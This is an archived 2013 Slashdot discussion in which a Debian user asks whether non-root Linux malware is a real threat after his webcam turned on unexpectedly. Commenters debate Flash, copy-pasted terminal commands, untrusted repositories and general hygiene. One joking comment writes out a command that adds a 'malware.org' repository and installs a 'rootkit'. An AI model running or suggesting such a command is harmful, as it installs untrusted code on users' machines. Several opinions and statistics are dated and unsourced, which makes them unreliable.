Forgot your password?
typodupeerror
GNU is Not Unix Operating Systems Worms IT Linux

Ask Slashdot: Is GNU/Linux Malware a Real Threat? 252

Posted by timothy
from the send-you-this-file-in-order-to-have-your-advice dept.
New submitter m.alessandrini writes "I've been using Debian for a long time, and I'm not a novice at all; I install system updates almost daily, I avoid risky behaviors on Internet, and like all Linux users I always felt safe. Yesterday my webcam suddenly turned on, and turned off after several minutes. I'm pretty sure it was nothing serious, but I started thinking about malware. At work I use noscript and other tools, but at home I have a more relaxed browser to be used by other family members, too. Here I'm not talking about rootkits or privilege escalation (I trust Debian), I think more of normal user compromise. For example, these days much malware come from malicious scripts in sites, even in advertising banners inside trusted sites, and this is more 'cross-platform' than normal viruses. So, what about non-root user malware? How much could this be real? And how can you diagnose it?"
This discussion has been archived. No new comments can be posted.

Ask Slashdot: Is GNU/Linux Malware a Real Threat?

Comments Filter:
  • by Anonymous Coward on Thursday May 30, 2013 @04:45PM (#43865453)

    Your webcam turned on, then off, and you didn't ask it to? I think you need to figure out what happened first.

    • by 0racle (667029) on Thursday May 30, 2013 @05:02PM (#43865731)
      You know it was more likely a misbehaving application polling the webcam and not anything nefarious right? As another poster said, Flash is probably a leading culprit.
      • Flash applications have to be given the right to access the Webcam. You can rightclick in a flash thing and go to Settings / Global Settings and look at the privileges per site, or generally deny it (by default: ask for each domain).

        • I'm sure a flash exploit (of which dozens are disclosed every year) is not going to obey some checkbox you've clicked in the settings.

          • by X0563511 (793323)

            Depends where the vulnerability is. If they get in prior to that check, then it would be obeyed, but if it's later in the codepath then of course it wouldn't apply.

        • Re: (Score:2, Interesting)

          by fast turtle (1118037)

          The only problem is, flash already has the right to access the damn camera/mic (default setting). You Have to deny it

      • by hobarrera (2008506) on Thursday May 30, 2013 @05:39PM (#43866251) Homepage

        I avoid risky behaviors on Internet

        I don't think op has flash installed.

        [...]turned on, and turned off after several minutes[...]

        Even so, polling a webcam is a few seconds at most, not minutes.

    • by gagol (583737)
      I use electrical tape... nice and clean and assure me nobody is going to take a snapshot of me in underwear! Oh, I don't do video conference much...
    • by hairyfeet (841228) <bassbeast1968@gm[ ].com ['ail' in gap]> on Thursday May 30, 2013 @07:36PM (#43867395) Journal

      The simple fact is ALL OSes can get malware unless they are either so locked down on permissions that they are basically read only or are thin clients which are locked down at the server, but even the Linux community claims Android as Linux and its going to reach a million infections any day now [techworld.com] so the argument over whether Linux malware is a threat? Pretty much over, that is what happens when somebody uses it for something popular, popular equals large target. Welcome to the club, the Mac guys that joined a couple of years back can show you the ropes, coffee and donuts are in the back.

      As for this specific case? As somebody who works on systems 6 days a week? Yeah...smells like he has an infection. Guys here can have a shitfit if they want but anybody who switches from an OS they know the ropes on to something completely new, I don't care if its Linux or Mac or Windows whatever? They are ALWAYS gonna be at higher risk than where they were simply because they don't know the new system and don't know what to watch out for. Hell he probably doesn't even know what should and shouldn't be running on his system or what to look for if there is a hijacked program or a backdoor installed.

      In this case, as much as I fricking hate to say it as I've found you have to wade through a LOT of shit and douchebags than run on pure smug and leetness in them places but in this particular case i don't see any choice, he is gonna have to go to the forums of his particular distro and tell them what is going on. They will have the most experience with that particular build, will know what is supposed to be running and what isn't on build blah blah whatever, and will be able to spot something that doesn't belong a hell of a lot faster than anybody here would.

      • by ozmanjusri (601766) <(aussie_bob) (at) (hotmail.com)> on Thursday May 30, 2013 @11:38PM (#43869043) Journal

        As for this specific case? As somebody who works on systems 6 days a week? Yeah...smells like he has an infection.

        I doubt it. You're just too used to Windows.

        The Australian Communications and Media Authority's statistics breakdown shows of about infected 16,500 devices online at any one time, 20 Windows viruses make up more than 16,400 of the active IPs. Rarer Windows viruses, and Mac, iOS, Linux and Android infections all total less than 100 infections.

        http://www.acma.gov.au/WEB/STANDARD..PC/pc=PC_600121 [acma.gov.au]

        If the OP's computer IS actually compromised, it's far more likely to be a targeted attack or insider job than a random infection. My money's on a friend, family or associate with access to the machine.

  • Preinfected (Score:4, Funny)

    by Anonymous Coward on Thursday May 30, 2013 @04:45PM (#43865459)

    It would help if the manufacturers would preinfect their software so we could stop worry about "if" we are infected and move towards just accepting it.
    *Disclaimer: I in no way work for, represent, or contract for Sony. (Sorry Sony lawyers made me add the preceding text.)

    • Re:Preinfected (Score:5, Informative)

      by CheshireDragon (1183095) on Thursday May 30, 2013 @05:16PM (#43865937) Homepage

      It would help if the manufacturers would preinfect their software so we could stop worry about "if" we are infected and move towards just accepting it.

      This is actually happening with phones now. just read some of the permissions of Facebook, Chrome, Firefox and a few others. They can take a photo or record audio without your permission.

      • by BobPaul (710574) *

        Android has no API for "take_a_photo_with_permission()", there's just stuff to access the camera. It definitely makes sense why facebook app might need access to the camera: it clearly supports taking photos directly, and that's something users want. I'm not sure about Firefox or Chrome, but maybe flash runs within the brower's security context, so the browser would need permission to access the camera if flash was going to?

        I highly doubt facebook, chrome, and firefox are using the camera without our knowle

        • by Solozerk (1003785)

          I'm not sure about Firefox or Chrome, but maybe flash runs within the brower's security context, so the browser would need permission to access the camera if flash was going to?

          HTML5. Flash is bundled separatly, but modern mobile browser have started to implement the getUserMedia stuff for webcam/micro access (without using flash).

  • Don't worry (Score:5, Insightful)

    by Black Parrot (19622) on Thursday May 30, 2013 @04:46PM (#43865487)

    It was just Skynet checking out what you were up to. Or maybe the ATF. Or Russian Mafia. Or...

    As for security, ~5 years ago read someone's account of watching while someone on the internet installed a root kit on his Linux box in a matter of minutes.

    Presumably some platforms/applications are less likely to be compromised than others, but the safest assumption is that everything is compromised, or would be if the experts wanted it.

  • That's not an O.S. issue. If anything it is an app issue.

  • by Doug Otto (2821601) on Thursday May 30, 2013 @04:49PM (#43865517)
    When I ran Linux on my laptop for work I always ran some form of AV. I really wasn't concerned about my own machine being compromised. The scenario that bothered me was the potential for a client to send me an infected file which could get forwarded to another customer. Do to the nature of our business, at the time, that would've been rather embarrassing.
    • by armanox (826486)

      Also, if you connect your device to other networks (say VPN into work, US DOE, etc), usually as part of the VPN access agreement you agree to have Antivirus software installed and up to date on your device. Doesn't say anything about 'unless you are running....' And personally, I try to avoid any scenario that they (work, client, etc) can say that I broke something by not following directions (see your scenario).

  • by Anonymous Coward

    Do not copy and paste commands into your terminal that you do not understand.

    The vast majority of compromised Linux systems that I've dealt with have not been because of any malware or crazy hacking, they've been because people copied and pasted commands that gave attackers free access to their computer. I've seen fairly computer literate people open their systems right up because they had a bug, searched Google, and entered the first command they saw into their terminal.

    Don't do it. Don't let your parents,

    • So you're saying adding the repository malware.org/debian and running sudo apt-get install rootkit was not a good idea? :-)

      • by gagol (583737)
        Oh men! I just did that yesterday. Now my system is averaging 4.16 load. You think its related?
    • by Time_Ngler (564671) on Thursday May 30, 2013 @05:23PM (#43866037)

      Also, do not ever copy and paste commands directly in your terminal from an untrusted website, even if you do understand them:

      http://thejh.net/misc/website-terminal-copy-paste [thejh.net]

      • Thanks for that.
        I usually run them through a text editor, so I have a complete record of what I have done, I will do the religiously from now on.
      • by Chryana (708485)

        Woah I'm impressed. Checking the website source, they made some extra code invisible, which now that I think of it is pretty trivial, and requires no Javascript voodoo. I guess I'll always copy and paste from the page source from now on.

  • Obligatory xkcd (Score:5, Interesting)

    by Anonymous Coward on Thursday May 30, 2013 @04:56PM (#43865655)

    http://xkcd.com/1200/

  • Your webcam (Score:5, Funny)

    by girlintraining (1395911) on Thursday May 30, 2013 @04:56PM (#43865659)

    Yesterday my webcam suddenly turned on, and turned off after several minutes.

    Hey, sorry about that. I was trying to get the girl next door that's leeching off your wifi. She's so cute! But when I turned on the webcam, I knew I had the wrong person. Also, dude, put some pants on. Nobody wants to see that.

    Oh, and that stuff about Linux having malware? I'm sure you have nothing to worry about. The Year of the Linux Desktop hasn't come yet (though they say it'll be this summer for sure!), so you're safe. All the malware me and my friends at the Evil League of Evil make for Linux is designed to worm its way into web servers, ftp, etc., to spread malware to Windows boxes. We aren't interested in your personal life. You're a nerd, running Linux. We haven't found a single case of one of you having a life yet. Hell, you don't even have a decent car, man.

    oh oh, gotta go, the webcam is up and... oooooh my....

  • Yes (Score:5, Insightful)

    by Anonymous Coward on Thursday May 30, 2013 @04:58PM (#43865673)

    As long as you have people on Ubuntu forums posting "sudo apt-get " as the solution to everything without explaining what they do, and as long as you have people willing to copy/paste the commands without understanding what they are doing, then malware is a threat.

    The same groupthink plagues the Arch Linux forums. Blindly copy/pasting commands that someone else put on a wiki does not make you elite, it makes you an idiot.

    The same issue exists in adding repositories from untrusted sources. What's the point of running an enterprise-class operating system if the first thing you do is add a third party repo from Russia and update the kernel with something ending -kmod?

    The critical mass of idiot users still reside in Windows, where things like UAC and walled gardens exist to protect them somewhat. At least there, you have to know the administrator password to do real damage. Ubuntu and all the new user-friendly distros are content to put every new account in /etc/sudoers and allow you to use your own password to gain root access. Any operating system is prone to malware so long as people are willing to bend security practices.

    • Ubuntu does not, have never, and will never put any user in sudoers.
      The default is allowing the groups admin and sudo, no more, no less.

      Anything else would be bloody retarded.

  • If I ran servers... (Score:5, Interesting)

    by Nutria (679911) on Thursday May 30, 2013 @04:58PM (#43865677)

    then I'd worry a lot. Rootkits for privilege escalation, SQL injection attacks against poorly-written 3rd-party and locally-developed databases, PHP, CMS & web framework vulnerabilities, etc, etc, etc.

    For home use, I'm concerned about router vulnerabilities (Tomato helps but is not perfect) and MITM attacks (but there's nothing I can really do about them except keep my s/w up-to-date, while praying that vendors do the same).

  • by trime (733350) on Thursday May 30, 2013 @05:05PM (#43865793)
    But I couldn't get the damn thing to compile!
  • by raymorris (2726007) on Thursday May 30, 2013 @05:34PM (#43866183)
    Assuming you don't do silly things like run completely unknown commands, you're pretty safe. JavaScript and Flash is cross-platform, though. I've seen one Linux system where their Yahoo email account was compromised, probably by malicious JavaScript. It might have been phishing, though, or a combination. The main things I do for security are - run most updates provided by the distro and browser, have backups, don't run services I don't use, and I have a separate browser for Flash and Java. Most Flash is ads or pointless eyecandy so I don't miss not having Flash in my daily browser. Even YouTube doesn't need Flash these days, so I open the Flash browser maybe once per month, if that.

    TEEX.com has some free online cybersecurity courses that may have good reminders for your and your family members regarding safe browsing habits and simple security practices.
  • OP writes:
    " I install system updates almost daily"

    Seems to me.that any OS requiring multiple updates per week is a fail.

    *DUCKS*

  • . . . should always be unplugged or covered up when not used, period. I love Debian myself, but as long as you have any kind of proprietary software on there, you don't really know what all of its behavior is and what it can be set up to do. Even if your system is totally free of this nonsense, that's not to say that an upgrade won't change that. That on/off light that webcams have - they're starting to go away; an iPad camera, I'm sure you're noticed, doesn't have one. You won't even know if your devic
  • I was just look to see what's going on at your place . . .

  • Two questions:

    • Why don't the others have their own log-ins
    • Why have Noscript if it isn't in deny all (particularly plug-ins)?

    On my system, I've got noscript configured to deny all by default and all the other users (with log-ins) are configured the same way be default. If they want to change things, they can do so for those sites where it's a must to have scripts but they've already learned to be very careful about that and ask if they don't know for sure.

  • Reading the replies some mentioned flash, Flash for Windows defaults to Webcam on, so thought I'd
    check my Flash for Mint as I wasn't sure if I had set the settings. Mint is my start in Linux and used infrequently.

    Things led to preferences, Network Proxy pref's showing that 127.0.0.1 as being ignored, hit the help button
    and get a standard Mint manual of which "network proxy" isn't found.
    http://i39.tinypic.com/2z5uf80.jpg [tinypic.com]

    No help, I see if it means what I think it means and put "127.0.0.1. slashdot.org" in my

  • by smash (1351)

    As with the OS X userbase, the Linux userbase is fairly blaise with regards to the possibility of being compromised.

    So far, the platform has been relatively safe, however as it gains popularity on the desktop expect more end-user focused malware (vs. the traditional sort of rootkit) to be developed. Given the vulnerabilities these days are mostly found in flash, java, javascript, etc, and your DATA is just as valuable (if not more) than root on your machine (and is available from your user account), I'd

  • You accidentally tapped a hotkey combination you were unaware existed.
  • Hey now, does anyone besides me remember past posts, regarding DOJ/FBI's own malware, CIPAV? It was a capable malware that knew the difference between Windows, Mac, & Linux (BTW-did anyone ever solve the legal dillema of scrubbing a customer pc and finding it? Do we remove it as we are paid to & obstruct justice or leave it and do a partial job?) Next, I recall a recent find, within about a year, an equally capable malware, found by F-Secure, in Bogota, which reconfigured itself, prior to attack
  • Mount home and tmp as non executable link [debian-adm...ration.org]

Whatever is not nailed down is mine. Whatever I can pry up is not nailed down. -- Collis P. Huntingdon, railroad tycoon

Working...